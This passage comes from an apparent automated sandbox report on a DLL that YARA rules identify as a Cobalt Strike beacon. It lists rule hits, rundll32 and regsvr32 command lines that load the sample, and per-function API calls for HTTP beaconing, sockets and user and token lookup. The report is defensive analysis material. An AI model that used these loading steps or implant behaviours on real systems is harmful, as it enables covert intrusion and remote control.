v3.8 to v4.x, Source: 00000000.00000003.435087941.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, Author: gssincla@google.com Rule: SUSP_PS1_FromBase64String_Content_Indicator, Description: Detects suspicious base64 encoded PowerShell expressions, Source: 00000000.00000003.581071660.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x, Description: Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, Source: 00000000.00000003.581071660.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, Author: gssincla@google.com Rule: SUSP_PS1_FromBase64String_Content_Indicator, Description: Detects suspicious base64 encoded PowerShell expressions, Source: 00000000.00000003.511799758.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x, Description: Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, Source: 00000000.00000003.511799758.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, Author: gssincla@google.com Rule: SUSP_PS1_FromBase64String_Content_Indicator, Description: Detects suspicious base64 encoded PowerShell expressions, Source: 00000000.00000002.620198943.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x, Description: Cobalt Strike\'s resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, Source: 00000000.00000002.620198943.00000000012D8000.00000004.00000800.00020000.00000000.sdmp, Author: gssincla@google.com Rule: CobaltStrike_Sleeve_BeaconLoader_VA_x86_o_v4_3_v4_4_v4_5_and_v4_6, Description: Cobalt Strike\'s sleeve/BeaconLoader.VA.x86.o (VirtualAlloc) Versions 4.3 through at least 4.6, Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, Author: gssincla@google.com Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, Author: FireEye Rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator, Description: Detects CobaltStrike C2 encoded profile configuration, Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net Rule: SUSP_XORed_Mozilla, Description: Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	high

Show Windows behavior

Target ID:	1
Start time:	16:03:18
Start date:	08/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	2
Start time:	16:03:18
Start date:	08/01/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1
Imagebase:	0xd90000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	3
Start time:	16:03:18
Start date:	08/01/2023
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\8082-x86.dll
Imagebase:	0x2a0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	4
Start time:	16:03:18
Start date:	08/01/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\8082-x86.dll",#1
Imagebase:	0x200000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	5
Start time:	16:03:18
Start date:	08/01/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllGetClassObject
Imagebase:	0x200000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	6
Start time:	16:03:22
Start date:	08/01/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllMain
Imagebase:	0x200000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	7
Start time:	16:03:25
Start date:	08/01/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\8082-x86.dll,DllRegisterServer
Imagebase:	0x200000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Execution Graph

Execution Coverage:	7.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	70

Executed Functions

Function 00951449 Relevance: 12.2, APIs: 8, Instructions: 169
networkfileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0095148A
__snprintf.LIBCMT ref: 009514B1

Part of subcall function 00956BFE: _memset.LIBCMT ref: 00956C1F

__snprintf.LIBCMT ref: 009514F8
__snprintf.LIBCMT ref: 0095150F
HttpOpenRequestA.WININET(00000000,?,00000000,00000000,0097C530,00982C58), ref: 0095153E
InternetQueryDataAvailable.WININET(00000000,0095052A,00000000,00000000), ref: 00951595
InternetReadFile.WININET(00000000,?,00001000,?), ref: 009515C3
InternetCloseHandle.WININET(00000000), ref: 009515E3

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: Internet__snprintf$_memset$AvailableCloseDataFileHandleHttpOpenQueryReadRequest
String ID:
API String ID: 974953942-0
Opcode ID: 847400e14561d048305194cb0579304c386d65b0e7c6544cc920beca0a426042
Instruction ID: 5b16e795bb93dfe190fbe77987f5f52411a58a2328746e5053a31d077cf6e219
Opcode Fuzzy Hash: 847400e14561d048305194cb0579304c386d65b0e7c6544cc920beca0a426042
Instruction Fuzzy Hash: CC51BEB2904109BFDF11EFA6EC85EAE7BBCEF84312F104065F915E3261D7309A499B50

Uniqueness

Uniqueness Score: -1.00%

Function 009578FB Relevance: 4.7, APIs: 3, Instructions: 155
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0095791D

Part of subcall function 00950669: _malloc.LIBCMT ref: 0095066F

ProcessIdToSessionId.KERNELBASE(?,?), ref: 00957A43
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00957A94

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotificationProcessSession_malloc_memset
String ID:
API String ID: 1282648473-0
Opcode ID: 6c145d2a6dc79635de235600b62e417d1ff8a067b65ef9adb41ec0202285b371
Instruction ID: c6ab5f8f79512e4e7cd5703dc37398bd60a7388c7f65edd39d00f314df2abfc5
Opcode Fuzzy Hash: 6c145d2a6dc79635de235600b62e417d1ff8a067b65ef9adb41ec0202285b371
Instruction Fuzzy Hash: 99519BB280421DAADF11EBE1DC46FEFBBBCAF44315F104055FA09E2151EB349B999B60

Uniqueness

Uniqueness Score: -1.00%

Function 009558DD Relevance: 4.6, APIs: 3, Instructions: 123
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00955B90: _malloc.LIBCMT ref: 00955B96
Part of subcall function 00955B90: _malloc.LIBCMT ref: 00955BA6

GetUserNameA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00955942

Part of subcall function 009516C7: WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000,00000100,00000094,00000000), ref: 009516E7

_strrchr.LIBCMT ref: 00955975
__snprintf.LIBCMT ref: 009559FC

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: _malloc$NameSocketUser__snprintf_strrchr
String ID:
API String ID: 2022469247-0
Opcode ID: 674a01701a01fbd1ee52385cc2da891853d5060c52b0094cd44863cc7a4f7bf7
Instruction ID: 0f21490a595249f1eece91e77f43ce16e937b065d11758cea1caf116d258795a
Opcode Fuzzy Hash: 674a01701a01fbd1ee52385cc2da891853d5060c52b0094cd44863cc7a4f7bf7
Instruction Fuzzy Hash: BF41B471C00209EEDF01EFA2DD5AEBEBFB8EF85312F104459F844A6152DB359A48DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00953410 Relevance: 1.4, APIs: 1, Instructions: 133sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?), ref: 009534AC

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 7a0e62f61d2487343c68d546d0fed2b5e277ec55e342f27ca8efb465afa3f918
Instruction ID: a136575cc831b2205bfd7a0ce5e89a42bc4e1012cb315f1381d82b54182e1eef
Opcode Fuzzy Hash: 7a0e62f61d2487343c68d546d0fed2b5e277ec55e342f27ca8efb465afa3f918
Instruction Fuzzy Hash: 5E418335604645DFCB16CF1AC490969BBF2FF89395B25C06DE89A8B322D231EE45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00951207 Relevance: 12.1, APIs: 8, Instructions: 147
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00951232
_memset.LIBCMT ref: 00951247
__snprintf.LIBCMT ref: 00951285
__snprintf.LIBCMT ref: 009512A1
__snprintf.LIBCMT ref: 00951301
__snprintf.LIBCMT ref: 00951318

Part of subcall function 00964326: __output_l.LIBCMT ref: 009643A8

HttpSendRequestA.WININET(00000000,?,?,?,?), ref: 0095137E
InternetCloseHandle.WININET(00000000), ref: 009513A8

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: __snprintf$_memset$CloseHandleHttpInternetRequestSend__output_l
String ID:
API String ID: 4209480158-0
Opcode ID: 99d1604c2be465741a6c9526ec8f82e632b444e6c1ddd6caa2dda54f4c78a932
Instruction ID: 72a68a269a47e4cdba454dc27f6bd6964bdc9a0a1941f370311f8a6edf7336f0
Opcode Fuzzy Hash: 99d1604c2be465741a6c9526ec8f82e632b444e6c1ddd6caa2dda54f4c78a932
Instruction Fuzzy Hash: 0041DD72904208AEDF11EFA5DC85FEE7BBDEF48305F0400A5F905B6151E7369A4C9B61

Uniqueness

Uniqueness Score: -1.00%

Function 0095031C Relevance: 7.8, APIs: 5, Instructions: 271
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00955B90: _malloc.LIBCMT ref: 00955B96
Part of subcall function 00955B90: _malloc.LIBCMT ref: 00955BA6

_malloc.LIBCMT ref: 009503A4

Part of subcall function 009641C7: __FF_MSGBANNER.LIBCMT ref: 009641EA
Part of subcall function 009641C7: __NMSG_WRITE.LIBCMT ref: 009641F1
Part of subcall function 009641C7: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,009865EC,?,0095006E,00004008), ref: 0096423E

Part of subcall function 0095A583: _malloc.LIBCMT ref: 0095A5AA
Part of subcall function 0095A583: _memset.LIBCMT ref: 0095A5D8

Part of subcall function 0095A583: _realloc.LIBCMT ref: 0095A5B9

_malloc.LIBCMT ref: 00950453
__snprintf.LIBCMT ref: 009504BC
__snprintf.LIBCMT ref: 009504DA
__snprintf.LIBCMT ref: 009504F8

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: _malloc$__snprintf$AllocateHeap_memset_realloc
String ID:
API String ID: 4273617250-0
Opcode ID: 8fc3dd14f3656030c8318f7b11c888ce7b2d26418093d251e742a2f8d2feeb7b
Instruction ID: b37ebf96c557675555ebd00bb7fbd76b436711b5c4b06ab88076ee52b5782816
Opcode Fuzzy Hash: 8fc3dd14f3656030c8318f7b11c888ce7b2d26418093d251e742a2f8d2feeb7b
Instruction Fuzzy Hash: 37810871508301AEE620FB779C43F2F76E8AFC4312F104929FE9496192EB75C94D9B52

Uniqueness

Uniqueness Score: -1.00%

Function 0095A007 Relevance: 7.6, APIs: 5, Instructions: 70
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0095A02B
_memset.LIBCMT ref: 0095A039
_memset.LIBCMT ref: 0095A047
GetTokenInformation.KERNELBASE(?,00000001,?,00001000,0095A0E6,?,?,?,?,?,0095A0E6,?,?), ref: 0095A064
__snprintf.LIBCMT ref: 0095A0B5

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: _memset$InformationToken__snprintf
String ID:
API String ID: 846195061-0
Opcode ID: 33bf412df3de96999e3d4c8063e66a5f9c72fa4b35e860dcc41cc3f142021b6a
Instruction ID: 556dde2985a4886e6866479e738501f349d6fabaaf7d295b0965630d7aafdcd1
Opcode Fuzzy Hash: 33bf412df3de96999e3d4c8063e66a5f9c72fa4b35e860dcc41cc3f142021b6a
Instruction Fuzzy Hash: CA212CF291021CBADB11DAA1DC85EEF77BCFF44744F0444AABA15E2141E674ABC48B64

Uniqueness

Uniqueness Score: -1.00%

Function 00959684 Relevance: 6.1, APIs: 4, Instructions: 115
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 0095969B

Part of subcall function 009641C7: __FF_MSGBANNER.LIBCMT ref: 009641EA
Part of subcall function 009641C7: __NMSG_WRITE.LIBCMT ref: 009641F1
Part of subcall function 009641C7: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,009865EC,?,0095006E,00004008), ref: 0096423E

_memset.LIBCMT ref: 009596AC

Part of subcall function 0095A583: _malloc.LIBCMT ref: 0095A5AA
Part of subcall function 0095A583: _memset.LIBCMT ref: 0095A5D8

_malloc.LIBCMT ref: 00959735

Part of subcall function 0095A583: _realloc.LIBCMT ref: 0095A5B9

_memset.LIBCMT ref: 009597B9

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: _malloc_memset$AllocateHeap_realloc
String ID:
API String ID: 3494230449-0
Opcode ID: 64eec32d2b91b2f28e81a66abc08dd65487a8aceb81c40b27b75f0678a56d23a
Instruction ID: 535e49885e3bfa18ac6107dd7cec7f559aa038fbb8e63810c755a65c5e4483b6
Opcode Fuzzy Hash: 64eec32d2b91b2f28e81a66abc08dd65487a8aceb81c40b27b75f0678a56d23a
Instruction Fuzzy Hash: C431387241474066E720EF6AEC82FAB73DCDBC8B11F14091FF980D71C2EB65A8888765

Uniqueness

Uniqueness Score: -1.00%

Function 009640EA Relevance: 6.0, APIs: 4, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 00964108

Part of subcall function 00965FE3: __mtinitlocknum.LIBCMT ref: 00965FF9
Part of subcall function 00965FE3: __amsg_exit.LIBCMT ref: 00966005

___sbh_find_block.LIBCMT ref: 00964113
___sbh_free_block.LIBCMT ref: 00964122
RtlFreeHeap.NTDLL(00000000,?,0097E5C8,0000000C,00965FC4,00000000,0097E728,0000000C,00965FFE,?,?,?,0096F821,00000004,0097EA88,0000000C), ref: 00964152

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: FreeHeap___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 438813202-0
Opcode ID: cdf616f66e1c119cad5b8a44835be8ae233e238ff29a6a42ddb9483889117694
Instruction ID: e3fdf6fe38b7dfdec53b56f8f887254535c856b2bd4ec1aefb1add344f4bd6e0
Opcode Fuzzy Hash: cdf616f66e1c119cad5b8a44835be8ae233e238ff29a6a42ddb9483889117694
Instruction Fuzzy Hash: CE016D3291D605EADB306BF19C0AB5E3BA8AF63361F564118F104A61D1DB3899819A94

Uniqueness

Uniqueness Score: -1.00%

Function 009516C7 Relevance: 4.6, APIs: 3, Instructions: 66
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000,00000100,00000094,00000000), ref: 009516E7
WSAIoctl.WS2_32(00000000,4004747F,00000000,00000000,?,000005F0,?,00000000,00000000), ref: 00951712
closesocket.WS2_32(00000000), ref: 00951751

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: IoctlSocketclosesocket
String ID:
API String ID: 3445158922-0
Opcode ID: 6c2667ad27b877b37b29d417545c37299d88cf8ad9c1254b17a8b76e77cd25d5
Instruction ID: 6c621c788f2381ae8408b13296cbc1d0311555b6d1c42cdbdf64bc4ff62eccdc
Opcode Fuzzy Hash: 6c2667ad27b877b37b29d417545c37299d88cf8ad9c1254b17a8b76e77cd25d5
Instruction Fuzzy Hash: 2A11E9316025247BD720CA6A9C49FFF7FADEB897A2F104061FE19D3181D7748D458B60

Uniqueness

Uniqueness Score: -1.00%

Function 00955B90 Relevance: 4.5, APIs: 3, Instructions: 35
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 00955B96

Part of subcall function 009641C7: __FF_MSGBANNER.LIBCMT ref: 009641EA
Part of subcall function 009641C7: __NMSG_WRITE.LIBCMT ref: 009641F1
Part of subcall function 009641C7: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,009865EC,?,0095006E,00004008), ref: 0096423E

_malloc.LIBCMT ref: 00955BA6
_memset.LIBCMT ref: 00955BC3

Part of subcall function 009640EA: __lock.LIBCMT ref: 00964108
Part of subcall function 009640EA: ___sbh_find_block.LIBCMT ref: 00964113
Part of subcall function 009640EA: ___sbh_free_block.LIBCMT ref: 00964122
Part of subcall function 009640EA: RtlFreeHeap.NTDLL(00000000,?,0097E5C8,0000000C,00965FC4,00000000,0097E728,0000000C,00965FFE,?,?,?,0096F821,00000004,0097EA88,0000000C), ref: 00964152

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: Heap_malloc$AllocateFree___sbh_find_block___sbh_free_block__lock_memset
String ID:
API String ID: 1068809023-0
Opcode ID: 57ef8a621da0dce13d4a0f92b1ba4d442abba253126c43550226ad94ad5e9317
Instruction ID: 7c7a3a866000d2359f96c2409434822362667b37adb1d01748ed2ce200bb4928
Opcode Fuzzy Hash: 57ef8a621da0dce13d4a0f92b1ba4d442abba253126c43550226ad94ad5e9317
Instruction Fuzzy Hash: CBE0223B24491937CB2276A6DC12FEF2E1D8FD27B2F220435FE089A542EA55884053E0

Uniqueness

Uniqueness Score: -1.00%

Function 00955A34 Relevance: 3.1, APIs: 2, Instructions: 124
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009645DA: __getptd.LIBCMT ref: 009645DF

_memset.LIBCMT ref: 00955B44
_memset.LIBCMT ref: 00955B83

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: _memset$__getptd
String ID:
API String ID: 2884234864-0
Opcode ID: c1c272e5b90634d025e55403de651fb10691064ca5e9acf0b95d427b2422f56c
Instruction ID: 35d43b97d03615d5b7d14bcc13e5a2948ff1f8066eba278f5c7359391742f922
Opcode Fuzzy Hash: c1c272e5b90634d025e55403de651fb10691064ca5e9acf0b95d427b2422f56c
Instruction Fuzzy Hash: CD31D972804208AADB10FBB6ED46F9E3B6C9FC5326F144116FD44E7183DA74C9889765

Uniqueness

Uniqueness Score: -1.00%

Function 00950FE6 Relevance: 3.1, APIs: 2, Instructions: 114
networkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(00950511,00000003,00000000,00000000,00000000,00000000,0097C524,?,?,00950511,?,?), ref: 00951067
InternetConnectA.WININET(?,?,00000000,00000000,00000003,00000000,00982C58,?,?,00950511,?,?), ref: 009510AE

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: Internet$ConnectOpen
String ID:
API String ID: 2790792615-0
Opcode ID: 237a1b5f1cfd8b9eafc8b85e0a22cd1b176e48fe0dcd0b653ba5b3b31018c65f
Instruction ID: 968231235aefb6e5714fffbc865643df889066d3251f4aa62e8863d7a82b58c2
Opcode Fuzzy Hash: 237a1b5f1cfd8b9eafc8b85e0a22cd1b176e48fe0dcd0b653ba5b3b31018c65f
Instruction Fuzzy Hash: FA31C876255745BAEA30A727AD4BFBF2F2CD7C1B12F504025FE00991E1C978498AE724

Uniqueness

Uniqueness Score: -1.00%

Function 00CE8C34 Relevance: 3.1, APIs: 2, Instructions: 83librarymemoryCOMMON

Download Yara Rule

APIs

LoadLibraryExA.KERNELBASE(-0000003F,00000000,00000001), ref: 00CE8C7B
VirtualAlloc.KERNELBASE(00000000,?,00003000,?,MqtNqt), ref: 00CE8D0C

Memory Dump Source

Source File: 00000000.00000003.364898115.0000000000CE0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_ce0000_loaddll32.jbxd

Yara matches

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: ab1574bfb117445310e7799441a9603d0f3f20793018a174e19dd5860c254bed
Instruction ID: fe8429f2a1abc52f84398afb4f48b7b0d1d24f144135182de7a06aad5cd65f86
Opcode Fuzzy Hash: ab1574bfb117445310e7799441a9603d0f3f20793018a174e19dd5860c254bed
Instruction Fuzzy Hash: E431EF71A00609AFDB08CF99C894BAEB7B5FF88310F10C599E9299B294D774EE44CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00950000 Relevance: 3.1, APIs: 2, Instructions: 62
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 00950069
_memset.LIBCMT ref: 00950074

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: _malloc_memset
String ID:
API String ID: 4137368368-0
Opcode ID: 9c137e4dc65d881f3998a9ebf22c5e3b79cca52d332f885e4ae7ee4b9387def3
Instruction ID: 0618ff2eeebaca6fd57cfd846245e84aad42c1cd8c638e50c227410956b52e00
Opcode Fuzzy Hash: 9c137e4dc65d881f3998a9ebf22c5e3b79cca52d332f885e4ae7ee4b9387def3
Instruction Fuzzy Hash: 801148717522514BD7358A3A8C10BB1B79C9FD3B56F0C41AAEE849B2C2D322DC09C790

Uniqueness

Uniqueness Score: -1.00%

Function 0095C7D5 Relevance: 1.8, APIs: 1, Instructions: 257
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_calloc.LIBCMT ref: 0095C837

Part of subcall function 00972340: __calloc_impl.LIBCMT ref: 00972355

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: __calloc_impl_calloc
String ID:
API String ID: 2108883976-0
Opcode ID: aadc5e003488945b06771028266b66eaebe2b98cc45ca0f9333c1f9bcb874618
Instruction ID: e42287e56865183f64d852d244fa58a1f0e534d3127250198b1e6ee6451b8b23
Opcode Fuzzy Hash: aadc5e003488945b06771028266b66eaebe2b98cc45ca0f9333c1f9bcb874618
Instruction Fuzzy Hash: 38A116B1900208EFDB21CF95CC45EAEBBBAFF89301F204559E941AA261D3B15A54EF60

Uniqueness

Uniqueness Score: -1.00%

Function 009590C6 Relevance: 1.6, APIs: 1, Instructions: 145
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 009590E6

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: 153a2e24ce3526fe7f77a5de785094de474b1814627b0e2b2899f1ab749ca310
Instruction ID: ef6b024405d60aee71350421bd82fccedbea78000d66f5bfef27ee3743c09699
Opcode Fuzzy Hash: 153a2e24ce3526fe7f77a5de785094de474b1814627b0e2b2899f1ab749ca310
Instruction Fuzzy Hash: 3D412836D0462AABEF10FBB6DC45AEE777CEF44355F140922FC11E7182EA3499498790

Uniqueness

Uniqueness Score: -1.00%

Function 00957106 Relevance: 1.6, APIs: 1, Instructions: 140COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00957114

Part of subcall function 009641C7: __FF_MSGBANNER.LIBCMT ref: 009641EA
